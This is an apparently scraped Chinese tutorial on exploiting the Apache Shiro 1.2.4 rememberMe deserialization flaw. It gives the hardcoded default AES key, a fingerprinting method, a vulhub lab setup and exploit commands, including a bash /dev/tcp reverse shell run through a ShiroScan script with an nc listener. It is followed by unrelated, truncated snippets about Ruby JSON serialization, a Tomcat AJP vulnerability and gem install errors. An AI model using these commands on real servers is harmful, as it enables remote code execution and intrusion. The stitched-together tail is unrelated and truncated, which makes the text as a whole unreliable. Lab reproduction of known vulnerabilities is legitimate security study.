文章目录
ApacheShiro 1.2.4 反序列化漏洞即shiro-550反序列化漏洞。Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。
Apache Shiro框架提供了记住我的功能(RememberMe),用户登录成功后会生成经过加密并编码的cooKie,cookie的key为RememberMe,cookie的值是经过对相关信息进行反序列化,然后使用aes加密,最后在使用base64编码处理形成的。
Shiro记住用户会话功能的逻辑为:
获取RememberMe的值-》Base64解密-》ASE解密-》反序列化
在服务端接收cookie值时,按照如下步骤来解析处理:
1、检索RememberMe cookie 的值
2、Base 64解码
3、使用AES解密(加密密钥硬编码)
4、进行反序列化操作(未作过滤处理)
在调用反序列化时未进行任何过滤,导致可以触发远程代码执行漏洞。
因为在反序列化时,不会对其进行过滤,所以如果传入恶意代码将会造成安全问题
在 1.2.4 版本前,是默认ASE秘钥,Key: kPH+bIxk5D2deZiIxcaaaA==,可以直接反序列化执行恶意代码。而在1.2.4之后,ASE秘钥就不为默认了,需要获取到Key才可以进行渗透
漏洞特征:shiro反序列化的特征:在返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段
未登录的情况下,请求包中的cookie没有rememberMe字段,返回包set-cookie里面也没有deleteme字段
登录失败的话,不管勾选RememberMe字段没有,返回包都会有remeberme=deleteme字段
不勾选RememberMe字段,登陆成功的话,返回包set-Cookie会有rememberMe=deleteMe字段。但是之后的所有请求中Cookie都不会有rememberMe字段
勾选RememberMe字段,登陆成功的话,返回包set-Cookie会有rememberMe=deleteMe字段,还会有rememberMe字段,之后的所有请求中Cookie都会有rememberMe字段
找到网站登录的地方,随便输入账号密码抓包(一定要输入点击登录),看返回包是否有remembeMe字段
如果以上没有返回remembeMe字段还可以尝试在请求包中的cookie中加入 rememberMe=1 ,来查看返回包是否有rememberMe=deleteMe字段。如果cookie字段有值则先清空
如我们直接访问登录的页面不进行登录,此时返回的数据包是没有remember字段的
我们手动加上一个cookie:rememberMe=1,注意cookie要放在Upgrade的上面,则返回了remember字段。说明使用了shiro框架
使用vulhub进行环境搭建,cd shiro,执行docker-compose up -d启动漏洞环境
访问8080,环境搭建成功
手工检测出了使用了shiro框架后就开始验证是否存在漏洞了如果存在则进行漏洞利用,这里漏洞检测和利用的方式有两种,一种是使用python脚本进行验证。第二种方式是使用jar工具进行验证
工具下载地址:https://github.com/feihong-cs/ShiroExploit-Deprecated.git
检测是否存在漏洞
首先去dnslog平台获取一个子域 -》http://www.dnslog.cn/
我这里使用ShiroScan脚本
python .\shiro_rce.py http://192.168.111.8:8080 "ping qtj7kt.dnslog.cn"
查看dnslog平台,如下,说明漏洞存在
这里反弹shell的命令需要进行加密才能执行(也可以使用其他不用加密的脚本),推荐一个网站填写IP/port可以自动生成反弹shell语句:https://gksec.com/tools/reverse-shell-generator/
bash -i >& /dev/tcp/攻击机ip/监听的端口 0>&1
NC开启监听
NC -lvp port
执行反弹shell语句
python .\shiro_rce.py http://192.168.111.8:8080 "bash -i >& /dev/tcp/192.168.111.128/9001 0>&1"
成功获取shell
相较于上面的python脚本,图形化工具操作起来更加的简单
工具自带爆破密钥功能,方便便捷,也可以修改回显方式以及利用链
也可以打内存马,我这里就不演示了,检测工具有很多,个人根据自己喜好即可~
1. 内容主要介绍shiro反序列化漏洞的原理和工具的利用。
2. 要加深对漏洞的理解还是需要多研究一下自己编写需要的程序
给定一个复杂的对象层次结构,幸运的是它不包含循环引用,我如何实现支持各种格式的序列化?我不是来讨论实际实现的。相反,我正在寻找可能会派上用场的设计模式提示。更准确地说:我正在使用Ruby,我想解析XML和JSON数据以构建复杂的对象层次结构。此外,应该可以将该层次结构序列化为JSON、XML和可能的HTML。我可以为此使用Builder模式吗?在任何提到的情况下,我都有某种结构化数据-无论是在内存中还是文本中-我想用它来构建其他东西。我认为将序列化逻辑与实际业务逻辑分开会很好,这样我以后就可以轻松支持多种XML格式。 最佳答案 我最
目录1.漏洞简介2、AJP13协议介绍Tomcat主要有两大功能:3.Tomcat远程文件包含漏洞分析4.漏洞复现 5、漏洞分析6.RCE实现的原理1.漏洞简介2020年2月20日,公开CNVD的漏洞公告中发现ApacheTomcat文件包含漏洞(CVE-2020-1938)。ApacheTomcat是Apache开源组织开发的用于处理HTTP服务的项目。ApacheTomcat服务器中被发现存在文件包含漏洞,攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件。该漏洞是一个单独的文件包含漏洞,依赖于Tomcat的AJP(定向包协议)。AJP自身存在一定缺陷,导致存在可控
我正在使用Ruby、Grape和ActiveRecord构建一个网络API。来自ASP.NETWebAPI我习惯于从JSON到类对象的自动模型绑定(bind),然后可以使用EntityFramework保存。我一直在搜索一下,看看在使用ActiveRecord时是否有类似的东西,但没有发现任何让我觉得我遗漏了一些非常明显的东西。将JSON反序列化为ActiveRecord模型的最佳方法是什么?更新Matts回答对简单类型非常有效,但是当我有关联时,我收到以下错误:ActiveRecord::AssociationTypeMismatch:Connector(#7029771166878
为什么Ruby的内置JSON不能反序列化简单的JSON原语,我该如何解决这个问题?irb(main):001:0>require'json'#=>trueirb(main):002:0>objects=[{},[],42,"",true,nil]#=>[{},[],42,"",true]irb(main):012:0>objects.eachdo|o|irb(main):013:1*json=o.to_jsonirb(main):014:1>beginirb(main):015:2*pJSON.parse(json)irb(main):016:2>rescueException=>ei
我有一个散列:h={"revision"=>7,"rev"=>"708a4bd5b","thumb_exists"=>false,"bytes"=>246000,"modified"=>"Sun,01Jul201217:09:15+0000","client_mtime"=>"Sun,01Jul201217:09:15+0000","path"=>"/GettingStarted.pdf","is_dir"=>false,"icon"=>"page_white_acrobat","root"=>"dropbox","mime_type"=>"application/pdf","size
如何序列化数组并将其反序列化为字符串?我尝试了以下代码,但它并没有真正返回原始整数数组,而是返回字符串数组。x=[1,2,3].join(',')#maybethisisnotthecorrectwaytoserializetostring?=>'1,2,3'x=x.split(',')=>['1','2','3']有没有办法在没有.collect{|x|的情况下将其恢复为整数?x.to_i}? 最佳答案 标准方法是使用Marshal:x=Marshal.dump([1,2,3])#=>"\x04\b[\bi\x06i\ai\b"M
我刚刚升级了我的应用程序以使用Ruby2.4.0,在捆绑过程中没有出现任何错误。但是,当我尝试启动我的服务器时,出现以下错误:Therewasanerrorwhiletryingtoloadthegem'uglifier'.(Bundler::GemRequireError)GemLoadErroris:wrongargumenttypeClass(expectedModule)我在本网站的其他答案中发现您需要将gem'therubyracer'添加到您的Gemfile,但自从我创建应用程序以来我就已经这样做了。我的机器上也安装了最新版本的NodeJS。有没有其他人遇到过这个错误并且知
我想在Ruby2.4上试用Rails4.2应用程序。但是,当我尝试这样做时,我收到关于jsongem版本1.8.3安装失败的错误。Gem::Ext::BuildError:ERROR:Failedtobuildgemnativeextension.currentdirectory:/Users/agrimm/.rbenv/versions/2.4.0-rc1/lib/ruby/gems/2.4.0/gems/json-1.8.3/ext/json/ext/generator/Users/agrimm/.rbenv/versions/2.4.0-rc1/bin/ruby-r./sitec
[版本信息]ruby2.4.0p0(2016-12-24修订版57164)[x86_64-linux]/gem2.0.3/Windows10我运行了bundleinstall,它告诉我运行geminstalljson-v'1.8.3'我这样做了,但得到了一个Failedtobuildgemnativeextension错误。Buildingnativeextensions.Thiscouldtakeawhile...ERROR:Errorinstallingjson:ERROR:Failedtobuildgemnativeextension./home/ec2-user/.rvm/ru
我正在尝试在Rails4.0.8中运行新创建的项目,但我收到错误消息:railss=>BootingWEBrick=>Rails4.0.8applicationstartingindevelopmentonhttp://0.0.0.0:3000=>Run`railsserver-h`formorestartupoptions=>Ctrl-Ctoshutdownserver/usr/local/lib/ruby/gems/2.4.0/gems/activesupport-4.0.8/lib/active_support/core_ext/numeric/conversions.rb:12